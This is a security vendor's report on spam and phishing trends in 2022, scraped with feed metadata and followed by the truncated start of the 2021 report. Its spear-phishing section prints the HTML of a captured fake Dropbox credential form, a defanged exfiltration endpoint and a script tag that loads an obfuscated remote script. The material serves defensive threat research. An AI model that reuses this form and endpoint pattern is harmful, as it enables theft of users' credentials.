holidays.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143725/spam-phishing-report-2022-21.jpg>)\n\nThe Telegram auction platform named Fragment went live in the October of 2022: it was selling unique usernames. You can become a user by linking your Telegram account or TON wallet. Scammers who were after those account details sent out links to fake Fragment pages. A visitor who tried to buy a username from the fake website was requested to log in. If the victim entered their credentials, the scam operators immediately grabbed those.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143807/spam-phishing-report-2022-22.png>)\n\n## Spam in 2022\n\n### The pandemic\n\nUnlike phishing, COVID-themed spam is still a thing. Most of that is "Nigerian-type" scams: millionaires dying from COVID bequeathing their money to treatment and prevention efforts, and to improve the lives of those who have recovered, or Mark Zuckerberg running a special COVID lottery where one can win a million euros even if they are not a Facebook user. Recipients are told that they could claim some IMF money left unallocated because of the pandemic. Others are offered hefty amounts under an anti-recession assistance program.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143915/spam-phishing-report-2022-23.png>)\n\nThe amount of spam exploiting the coronavirus theme in some way dropped noticeably during 2022: at the beginning of the year, we were blocking a million of these emails per month, but the figure had shrunk by three times by yearend.\n\n### Contact form spam\n\nThe year 2022 saw cybercriminals abuse contact forms for spam more frequently. In a typical scheme of this kind, scammers find websites that offer registration, contact, or support request forms that do not require the user to be logged in to submit, and do not check the data entered. In some cases, they insert a scam message with a hyperlink in the login or name fields, and in others, add a longer text with images to the message field. Then the attackers add victims' email addresses to the contact fields and submit. When getting a message via a registration or contact form, most websites reply to the user's email address that their request was received and is being processed, their account has been created, and so on. As a result, the person gets an automated reply from an official address of a legitimate organization, containing unsolicited advertisements or a scam link.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13144349/spam-phishing-report-2022-24.png>)\n\nMost scam messages offer a compensation or prize to the recipient. For example, a spam email targeting Russian users promised an equivalent of $190\u20134200 in VAT refunds. To get the money, the victim was offered to open the link in the message. This scheme is a classic: a linked web page requests that the user pay a commission of under a dozen dollars, which is insignificant in comparison to the promised refund. We observed many varieties of contact form money scam: from fuel cards to offers to make money on some online platform.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13145016/spam-phishing-report-2022-25.png>)\n\nScammers took advantage of forms on legitimate sites all around the world. Where spam email in Russian typically played on "prizes" or "earning money", messages in other languages, in addition to offering "prizes", encouraged users to visit "dating sites" \u2014 in fact, populated by bots \u2014 where the victims would no doubt be asked to pay for a premium account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150322/spam-phishing-report-2022-26.png>)\n\nWe blocked upward of a million scam emails sent via legitimate forms in 2022.\n\n### Blackmail in the name of law enforcement agencies\n\nExtortion spam is nothing new. In such emails, attackers usually claim that the recipient has broken the law and demand money. In 2022, these mailings not only continued, but also evolved. For example, there was virtually no text in the messages: the user was either asked to open an attached PDF file to find out more, or they received threats in the form of an image with text. In addition, the geography of mailings widened in 2022.\n\nThe essence of the message, as in similar emails sent earlier, was that a criminal case was going to be opened against the recipient due to allegedly visiting sites containing child pornography.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150404/spam-phishing-report-2022-27.png>)\n\nTo avoid serious consequences, the attackers urged the victim to respond as soon as possible to the sender and "settle the matter". Most likely, the scammers would ask for a certain amount of money to be paid in further correspondence for the victim's name to be removed from the "criminal case". In 2022, we blocked over 100,000 blackmail emails in various countries and languages, including French, Spanish, English, German, Russian and Serbian.\n\n### Exploiting the news\n\nSpammers constantly use major world events in their fraudulent schemes. The 2022 geopolitical crisis was no exception. Throughout the year, we saw mailings aimed at English-speaking users proposing transferring money, usually to a Bitcoin wallet, to help the victims of the conflict in Ukraine. Scammers often demand the transfer of money to Bitcoin wallets, as it is more difficult to trace the recipient through cryptocurrency transactions than through the bank ones. Blackmail demanding payment in cryptocurrency used to prevail in spam. Now, attackers have started collecting Bitcoin for charity.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150431/spam-phishing-report-2022-28.png>)\n\nThe news agenda was also used in other scam mailings. For example, in early July, our solutions blocked 300,000 emails where fraudsters were requesting help on behalf of a Russian millionaire, who allegedly wanted to invest money and avoid sanctions. Another mailing said that the European Commission had decided to give away a fund created by Russian oligarchs, and the email recipient might be lucky to get a piece of this pie.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150458/spam-phishing-report-2022-29.jpg>)\n\nMore and more "business offers" are appearing among spam mailings, and they exploit the current information agenda. Due to economic sanctions in 2022, enterprising businessmen offered replacements for goods and services from suppliers who left the Russian market. For example, spammers actively advertised services of a company transporting people to Russia. The email text emphasized the fact that many transport companies refused to provide such services.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153541/spam-phishing-report-2022-30.png>)\n\nThere were also spam mailings where various companies offered to replace popular international software with Russian equivalents or solutions developed in third countries. In addition, there were spam propositions for intermediary services to open a company or bank account in neighboring countries, such as Armenia, as well as offers of assistance in accepting payments from foreign partners.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153600/spam-phishing-report-2022-31.png>)\n\nThe shortage of printer paper in Russia in March and April 2022 spawned a wave of related ads offering paper at discount prices.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153622/spam-phishing-report-2022-32.png>)\n\nSpammers in 2022 also actively marketed their promotional mailing services as alternative advertising to unavailable promotion via platforms such as Instagram. For example, in April we blocked around a million of such mailings.\n\nAgainst the backdrop of sanctions and the accompanying disruption of supply chains, there has been an increase in spam offering goods and services from Chinese suppliers. In 2022, our filter blocked more than 3.5 million emails containing such offers, and the number of them was growing, from around 700,000 in the first quarter to more than a million in the fourth.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153708/spam-phishing-report-2022-33.png>)\n\n### Spam with malicious attachments\n\nEmployees shifting to remote work during the pandemic and the associated growth of online communications spurred the active development of various areas of phishing, both mass and targeted. Attackers have become more active in imitating business correspondence, not only targeting HR-specialists and accountants, as before the pandemic, but also employees in other departments. In 2022, we saw an evolution of malicious emails masquerading as business correspondence. Attackers actively used social engineering techniques in their emails, adding signatures with logos and information from specific organizations, creating a context appropriate to the company's profile, and applying business language. They also actively exploited off the current news agenda and mentioned real employees from the company supposedly sending the emails. Spammers faked their messages as internal company correspondence, business correspondence between different organizations, and even as notifications from government agencies.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153731/spam-phishing-report-2022-34.png>)\n\nMasking malicious emails as business correspondence has become a major trend in malicious spam in 2022. Attackers tried to convince the recipient that it was a legitimate email, such as a commercial offer, a request for the supply of equipment, or an invoice for the payment of goods. For example, throughout the year, we encountered the following scheme. Attackers gained access to real business correspondence (most likely by stealing correspondence from previously infected computers) and sent malicious files or links to all of its participants in response to the previous email. This trick makes it harder to keep track of malicious emails, and the victim is more likely to fall for it.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153756/spam-phishing-report-2022-35.png>)\n\nIn most cases, either the [Qbot](<https://securelist.com/qakbot-technical-analysis/103931/>) Trojan or [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/>) was loaded when the malicious document was opened. Both can be used to steal user data, collect information about the corporate network, and spread additional malware, such as ransomware. Qbot also allows you to gain access to emails and steal them for further attacks.\n\nMailings imitating notifications from various ministries and other government organizations have become more frequent in the Runet. Emails were often designed to take into account the specific activities of the organizations they were pretending to be. The sender's addresses copied the logic of email addresses in the relevant agencies, and the malicious attachment was disguised as some kind of specialized document, such as "key points of the meeting". For example, malicious code was found in one of these mailings that exploited a vulnerability in the Equation Editor module, the formula editor in Microsoft Office.\n\nThe perpetrators did not ignore the news agenda. In particular, the malware was distributed under the guise of call-up "as part of partial mobilization" or as a "new solution" to safeguard against possible threats on the internet "caused by hostile organizations".\n\nIn the second case, the program installed on victim's computer was in fact a crypto-ransomware Trojan.\n\n## Two-stage spear phishing using a known phish kit\n\nIn 2022, we saw an increase in spear (or targeted) phishing attacks targeting businesses around the world. In addition to typical campaigns consisting of one stage, there were attacks in several stages. In the first email, scammers in the name of a potential client asked the victim to specify information about its products and services. After the victim responds to this email, the attackers start a phishing attack.\n\nKey facts:\n\n * Attackers use fake Dropbox pages created using a well-known phishing kit\n * The campaign targets the sales departments of manufacturers and suppliers of goods and services\n * Attackers use SMTP IP addresses and _From_ domains provided by Microsoft Corporation and Google LLC (Gmail)\n\n### Statistics\n\nThe campaign began in April 2022, with malicious activity peaking in May, and ended by June.\n\n_Number of emails related to a two-step targeted campaign detected by Kaspersky solutions ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161029/01-en-spam-report-2022-diagrams.png>))_\n\n### How a phishing campaign unfolds\n\nAttackers send an email in the name of a real trade organization requesting more information about the victim company's products. The email text looks plausible and has no suspicious elements, such as phishing links or attachments. A sender's email address from a free domain, like gmail.com, may raise doubts. The email on the screenshot below is sent from an address in this domain, and the company name in the _From_ field is different to its name in the signature.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153835/spam-phishing-report-2022-36.jpg>)\n\n**_Example of the first email_**\n\nIt is worth noting that the use of free domains is not typical for spear phishing in the name of organizations, because such domains are rarely used in business. Most often in targeted attacks, attackers either use [spoofing of the legitimate domain](<https://securelist.com/email-spoofing-types/102703/>) of the organization they are pretending to be, or register domains similar to the original one. In addition, Google and Microsoft are pretty quick in blocking email addresses spotted sending spam. This is the most likely reason why attackers used different addresses in the _From_ header (where the email came from) and _Reply-to_ header (where the reply will go when clicking "Reply" in your email client). This means the victim responds to another address, which may be located in another free domain, such as outlook.com. The address in the _Reply-to_ header is not used for spam, and correspondence with it is initiated by the victim, so it is less likely to be blocked quickly.\n\nAfter victims respond to a first email, attackers send a new message, asking them to go to a file-sharing site and view a PDF file with a completed order, which can be found via the link.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153858/spam-phishing-report-2022-37.jpg>)\n\n**_An email with a phishing link_**\n\nBy clicking the link, the user is taken to a fake site generated by a well-known phishing kit. It is a fairly simple tool that generates phishing pages to steal credentials from specific resources. Our solutions blocked fake WeTransfer and Dropbox pages created with this kit.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153925/spam-phishing-report-2022-38.jpg>)\n\n**_A fake WeTransfer page created using the same phish kit as the target campaign sites_**\n\nIn the phishing campaign described above, the phishing site mimics a Dropbox page with static file images and a download button. After clicking any element of the interface, the user is taken to a fake Dropbox login page that requests valid corporate credentials.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153950/spam-phishing-report-2022-39.png>)\n\n**_A fake Dropbox page_**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154022/spam-phishing-report-2022-40.jpg>)\n\n**_Login page with a phishing form_**\n\nWhen victims attempt to log in, their usernames and passwords are sent to https://pbkvklqksxtdrfqkbkhszgkfjntdrf[.]herokuapp[.]com/send-mail.\n \n \n <form name=\"loginform\">\n <div class=\"form-group\">\n <label for=\"\">Email Address</label>\n <input type=\"email\" id=\"email\" class=\"form-control\" name=\"email\" placeholder=\"email Address\">\n <div class=\"email-error\"></div>\n </div>\n <div class=\"form-group\">\n <label for=\"\">Password</label>\n <input type=\"password\" id=\"password\" class=\"form-control\" name=\"password\" placeholder=\"Password\">\n <div class=\"password-error\"></div>\n </div>\n <div class=\"form-group btn-area\">\n <button class=\"download-btn\" id=\"db\" type=\"submit\">Download</button>\n </div>\n </form>\n </div>\n <script src=\"https://firebasestorage.googleapis.com/v0/b/linktopage-c7fd6.appspot.com/o/obfuscated.js?alt=media&token=1bb73d28-53c8-4a1e-9b82-1e7d62f3826b\"></script>\n\n**_HTML representation of a phishing form_**\n\n### Victims\n\nWe have identified targets for this campaign around the world, including the following countries: Russia, Bosnia and Herzegovina, Singapore, USA, Germany, Egypt, Thailand, Turkey, Serbia, Netherlands, Jordan, Iran, Kazakhstan, Portugal, and Malaysia.\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nIn 2022, an average of 48.63% of emails worldwide were spam, representing a 3.07 p.p. increase on 2021. Over the course of the year, however, the share of spam in global email traffic has gradually declined, from 51.02% in the first quarter to 46.16% in the fourth.\n\n_Share of spam in global email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161102/02-en-spam-report-2022-diagrams.png>))_\n\nThe most active month in terms of spam was February 2022, with junk traffic accounting for 52.78% of all email correspondence. June was in second place (51.66%). December was the calmest, only 45.20% of emails in this month were spam.\n\nOn Runet, the proportion of spam in email traffic is generally higher than worldwide. In 2022, an average of 52.44% of emails were junk mailings. At the same time, the trend for a gradual shift in ratio in favor of legitimate correspondence can also be seen. We saw the largest share of spam in Runet in the first quarter, with 54.72% of all emails, and by the fourth quarter it had dropped to 49.20%.\n\n_Proportion of spam in Runet email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161132/03-en-spam-report-2022-diagrams.png>))_\n\nEven though the second quarter (53.96%) was quieter in terms of spam than the first, the most active month in the Russian segment of the internet was June (60.16%). Most likely, the share of spam in June, both in Russia and globally, was influenced by the surge in mailings with offers from Chinese factories that we observed in that month. And the quietest month in Runet was December (47.18%), the same as globally.\n\n### Countries and territories \u2014 sources of spam\n\nIn 2022, the share of spam from Russia continued to grow, from 24.77% to 29.82%. Germany (5.19%) swapped places with mainland China (14.00%), whose share increased by 5.27 percentage points. Third place is still held by the United States (10.71%).\n\n_TOP 20 countries and territories \u2014 sources of spam, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161204/04-en-spam-report-2022-diagrams.png>))_\n\nThe Netherlands remained in fifth place (3.70%), its share decreased compared to 2021. Sixth and seventh places went to Japan (3.25%) and Brazil (3.18%), whose shares rose by 0.89 and 3.77 p.p., respectively. Next come the UK (2.44%), France (2.27%) and India (1.82%).\n\n### Malicious mail attachments\n\nIn 2022, our Mail Anti-Virus detected 166,187,118 malicious email attachments. That's an increase of 18 million from the previous year. This component caused most triggers in March, May, and June 2022.\n\n_Number of Mail Anti-Virus hits, January \u2014 December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161240/05-en-spam-report-2022-diagrams.png>))_\n\nThe most common malicious email attachments in 2022, as in 2021, were [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) Trojan stealers (7.14%), whose share decreased slightly. [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (4.89%) moved up to second place, and [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (4.61%) spreading as archived electronic documents moved down to third place. The fourth most common malware were vulnerability exploits [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (4.33%) in Microsoft Equation Editor. In 2022, attackers used them significantly more often than [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) exploits in the same component (1.80%). This vulnerability was more widespread in 2021 and has now dropped to tenth place.\n\n_TOP 10 malware families spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161308/06-en-spam-report-2022-diagrams.png>))_\n\n[ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) Trojans (3.27%), sent in the form of disk images, moved up to number five, and the sixth most common was the [Guloader](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Guloader/>) downloader family (2.65%), which delivers remotely controlled malware to victims' devices. They are closely followed by the [Badur](<https://threats.kaspersky.com/en/threat/Trojan.PDF.Badur/>) family (2.60%), PDF files containing links to web resources with questionable content, and in eighth place is the infamous [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/106290/>) botnet (2.52%). Law enforcement shut this down in early 2021, but by fall, attackers had restored the infrastructure and were actively distributing it in 2022. More recently, Emotet has been used to deliver other malware to victims' devices, particularly ransomware. The ninth most popular family was [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (2.10%), which creates malicious tasks in the task scheduler.\n\n_TOP 10 types of malware spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161339/07-en-spam-report-2022-diagrams.png>))_\n\nThe list of the most common malware sent via email usually corresponds to the list of families. As in 2021, attackers mostly distributed the same instances from the TOP 10 families.\n\n### Countries and territories targeted by malicious mailings\n\nSpain remains the leader in terms of blocked malicious attachments in 2022 (8.78%), which is a slight decrease compared to 2021 (9.32%). The share of Russia (7.29%), on the other hand, increased slightly. Third place went to Mexico (6.73%), and fourth place to Brazil (4.81%), whose share was virtually unchanged from the previous reporting period.\n\n_TOP 20 countries and territories targeted by malicious mailings, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161409/08-en-spam-report-2022-diagrams.png>))_\n\nIn Italy, 4.76% of all detected malicious attachments were blocked in 2022. The country is followed by Vietnam (4.43%) and Turkey (4.31%). The percentage of Mail Anti-Virus detections on computers of users from Germany (3.85%) continued to decrease. The share in the United Arab Emirates (3.41%) also decreased slightly, dropping to ninth place, while Malaysia (2.98%) remained in tenth place.\n\n## Statistics: phishing\n\nIn 2022, the number of phishing attacks increased markedly. Our Anti-Phishing system prevented 507,851,735 attempts to follow a phishing link, roughly double the number in 2021.\n\n### Map of phishing attacks\n\nIn 2022, the geography of phishing attacks changed dramatically. Attempts to click phishing links were most often blocked on devices from Vietnam (17.03%). In 2021, this country was not among the TOP 10 most attacked countries and territories. Macau is in second place (13.88%), also absent from last year's ranking. Madagascar is in third place (12.04%), which was seventh in 2021. In addition to Vietnam and Macau, Algeria (11.05%), Malawi (10.91%) and Morocco (10.43%) appeared at the top of the list of most attacked countries and territories. Ecuador (11.05%) moved up to fifth place, while Brunei (10.59%) dropped one place to seventh. Brazil (10.57%) and Portugal (10.33%) moved from first and third places to eighth and tenth, respectively, and France, which was second in 2021, left the TOP 10.\n\nTOP 10 countries and territories by share of attacked users:\n\n**Country/territory** | **Share of attacked users*** \n---|--- \nVietnam | 17.03% \nMacau | 13.88% \nMadagascar | 12.04% \nAlgeria | 11.05% \nEcuador | 11.05% \nMalawi | 10.91% \nBrunei | 10.59% \nBrazil | 10.57% \nMorocco | 10.43% \nPortugal | 10.33% \n \n**_* Share of users encountering phishing out of the total number of Kaspersky users in that country/territory, 2022_**\n\n### Top-level domains\n\nAs in previous years, the majority of phishing pages were hosted in the COM domain zone, but its share almost halved, from 31.55% to 17.69%. Zone XYZ remained in second place (8.79%), whose share also decreased. The third most popular domain among attackers was FUN (7.85%), which had not previously received their attention. The domain is associated with entertainment content, which is perhaps what attracted fraudsters to it.\n\n_Most frequent top-level domains for phishing pages in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161441/09-en-spam-report-2022-diagrams.png>))_\n\nDomains ORG (3.89%) and TOP (1.80%) swapped places relative to 2021 but remained in fourth and fifth places. In addition to this, the top ten domain zones in most demand among cybercriminals included: RU (1.52%), COM.BR (1.13), DE (0.98%), CO.UK (0.98%) and SE (0.92%).\n\n### Organizations under phishing attacks\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nIn 2022, pages impersonating delivery services had the highest percentage of clicks on phishing links blocked by our solutions (27.38%). Online stores (15.56%), which were popular with attackers during the pandemic, occupied second place. Payment systems (10.39%) and banks (10.39%) ranked third and fourth, respectively.\n\n_Distribution of organizations targeted by phishers, by category, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161508/10-en-spam-report-2022-diagrams.png>))_\n\nThe share of global internet portals (8.97%) almost halved, with almost as many phishing resources targeting users of smaller web services (8.24%). Social networks (6.83%), online games (2.84%), messengers (2.02%) and financial services (1.94%) round complete the TOP 10 categories of sites of interest to criminals.\n\n### Hijacking Telegram accounts\n\nIn 2022, our solutions stopped 378,496 phishing links aimed at hijacking Telegram accounts. Apart from a spike in phishing activity throughout June, when the number of blocked links exceeded 37,000, the first three quarters were relatively quiet. However, by the end of the year, the number of phishing attacks on the messenger's users increased dramatically to 44,700 in October, 83,100 in November and 125,000 in December. This increase is most likely due to several large-scale Telegram account hijacking campaigns that we [observed in late 2022](<https://www.kaspersky.ru/blog/telegram-takeover-contest/34472/>) (article in Russian).\n\n_Number of clicks on phishing links aimed at hijacking a Telegram account worldwide, and in Russia specifically, January \u2014 December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161540/11-en-spam-report-2022-diagrams.png>))_\n\nIt is of note that the majority of phishing attacks were aimed at users from Russia. While in the first months of 2022 their share was approximately half of the total number of attacks worldwide, since March 70\u201390% of all attempts to follow phishing links by Telegram users were made by Russian users.\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn 2022, our mobile solution blocked 360,185 attempts to click on phishing links from messengers. Of these, 82.71% came from WhatsApp, 14.12% from Telegram and another 3.17% from Viber.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161612/12-en-spam-report-2022-diagrams.png>))_\n\nPhishing activity on WhatsApp is down slightly since 2021. On average, the Safe Messaging component blocked 816 clicks on fraudulent links per day. The first half of the year was the most turbulent, and by the third quarter, phishing activity in the messenger had dropped sharply.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154605/spam-phishing-report-2022-42.png>)\n\n**_Dynamics of phishing activity on WhatsApp in 2022 (weekly number of detected links shown)_**\n\nThe largest number of phishing attempts on WhatsApp, approximately 76,000, was recorded in Brazil. Russia is in second place, where over the year, the Chat Protection component prevented 69,000 attempts to go to fraudulent resources from the messenger.\n\n_TOP 7 countries and territories where users most often clicked phishing links in WhatsApp ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161647/13-en-spam-report-2022-diagrams.png>))_\n\nUnlike WhatsApp, the number of phishing attacks on Telegram almost tripled in 2022 compared to the previous reporting period. On average, our solutions blocked 140 attempts to follow phishing links in this messenger per day. The peak of activity came at the end of June and beginning of July, when the number of blocked clicks could have exceeded 1,500 per week. Phishing activity on Telegram also increased sharply at the end of the year.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154645/spam-phishing-report-2022-41.png>)\n\n**_Dynamics of phishing activity on Telegram in 2022 (weekly number of detected links shown)_**\n\nIn Russia, we recorded the largest number (21,000) of attempts to click a link to fraudulent resources from Telegram. Second place went to Brazil, where 3,800 clicks were blocked.\n\n_TOP 7 countries and territories where users most frequently clicked phishing links from Telegram ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161717/14-en-spam-report-2022-diagrams.png>))_\n\n## Conclusion\n\nTimes of crisis create the preconditions for crime to flourish, including online. Scams promising compensation and payouts from government agencies, large corporations and banks are likely to remain popular among cybercriminals next year. The unpredictability of the currency market and departure of individual companies from specific countries' markets will likely affect the number of scams associated with online shopping. At the same time, the COVID-19 topic, popular with cybercriminals in 2020 and 2021, but already beginning to wane in 2022, will finally cease to be relevant and will be replaced by more pressing global issues.\n\nRecently, we've seen an increase in targeted phishing attacks where scammers don't immediately move on to the phishing attack itself, but only after several introductory emails where there is active correspondence with the victim. This trend is likely to continue. New tricks are also likely to emerge in the corporate sector in 2023, with attacks generating significant profits for attackers.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-02-16T08:00:07", "type": "securelist", "title": "Spam and phishing in 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2023-02-16T08:00:07", "id": "SECURELIST:49E48EDB41EB48E2FCD169A511E8AACD", "href": "https://securelist.com/spam-phishing-scam-report-2022/108692/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-14T15:27:23", "description": "\n\n## Figures of the year\n\nIn 2021:\n\n * 45.56% of e-mails were spam\n * 24.77% of spam was sent from Russia with another 14.12% from Germany\n * Our Mail Anti-Virus blocked 148 173 261 malicious attachments sent in e-mails\n * The most common malware family found in attachments were Agensla Trojans\n * Our Anti-Phishing system blocked 253 365 212 phishing links\n * Safe Messaging blocked 341 954 attempts to follow phishing links in messengers\n\n## Trends of the year\n\n### How to make an unprofitable investment with no return\n\nThe subject of investments gained significant relevance in 2021, with banks and other organizations actively promoting investment and brokerage accounts. Cybercriminals wanted in on this trend and tried to make their "investment projects" look as alluring as possible. Scammers used the names of successful individuals and well-known companies to attract attention and gain the trust of investors. That's how cybercriminals posing as Elon Musk or the Russian oil and gas company Gazprom Neft tricked Russian-speaking victims into parting with small sums of money in the hope of landing a pot of gold later. In some cases, they'd invite the "customer" to have a consultation with a specialist in order to come across as legit. The outcome would still be the same: the investor would receive nothing in return for giving their money to the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094031/Spam_report_2021_01.png>)\n\nSimilar schemes targeting English speakers were also intensively deployed online. Scammers encouraged investment in both abstract securities and more clearly outlined projects, such as oil production. In both cases, victims received nothing in return for their money.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094100/Spam_report_2021_02.png>)\n\nAnother trick was to pose as a major bank and invite victims to participate in investment projects. In some instances, scammers emphasized stability and the lack of risk involved for the investor, as well as the status of the company they were posing as. In order to make sure the investors didn't think the process sounded too good to be true, victims were invited to take an online test or fill out an application form which would ostensibly take some time to be "processed".\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094120/Spam_report_2021_03.png>)\n\n### Films and events "streamed" on fake sites: not seeing is believing!\n\nOnline streaming of hyped film premieres and highly anticipated sports events was repeatedly used to lure users in 2021. Websites offering free streaming of the new [Bond](<https://www.kaspersky.com/blog/bond-cybersecurity-in-craig-era/42733/>) movie or the latest Spider-Man film [appeared online](<https://threatpost.com/spider-man-movie-credit-card-harvesting/177146/>) shortly ahead of the actual release date, continuing to pop up until the eve of the official premiere. Scammers used various ploys to try and win the victim's trust. They used official advertisements and provided a synopsis of the film on the website.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094149/Spam_report_2021_04.png>)\n\nHowever, the promised free stream would be interrupted before the film even got going. Visitors to the site would be shown a snippet of a trailer or a title sequence from one of the major film studios, which could have absolutely nothing to do with the film being used as bait. Visitors would then be asked to register on the website in order to continue watching. The same outcome was observed when users tried to download or stream sports events or other content, the only difference was visitors might not be able to watch anything without registering. Either way the registration was no longer free. The registration fee would only be a symbolic figure according to the information provided on the website, but any amount of money could be debited once the user had entered their bank card details, which would immediately fall into the hands of attackers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094211/Spam_report_2021_05.png>)\n\n### A special offer from cybercriminals: try hand at spamming\n\nMore and more often, scam websites posing as large companies that promise huge cash prizes in return for completing a survey have begun setting out stricter criteria for those who want a chance to win. After answering a few basic questions, "prize winners" are required to share information about the prize draw with a set number of their contacts via a messaging app. Only then is the victim invited to pay a small "commission fee" to receive their prize. This means the person who completes the full task not only gives the scammers money, but also recommends the scam to people in their list of contacts. Meanwhile, friends see the ad is from someone they know rather than some unknown number, which could give them a false sense of security, encouraging them to follow the link and part with their money in turn.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094234/Spam_report_2021_06.png>)\n\n### Hurry up and lose your account: phishing in the corporate sector\n\nThe main objective for scammers in an attack on an organization remained getting hold of corporate account credentials. The messages that cybercriminals sent to corporate e-mail addresses were increasingly disguised as business correspondence or notifications about work documents that required the recipient's attention. The attackers' main objective was to trick the victim into following the link to a phishing page for entering login details. That's why these e-mails would contain a link to a document, file, payment request, etc., where some sort of urgent action supposedly needed to be taken.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094310/Spam_report_2021_07.png>)\n\nThe fake notification would often concern some undelivered messages. They needed to be accessed via some sort of "email Portal" or another similar 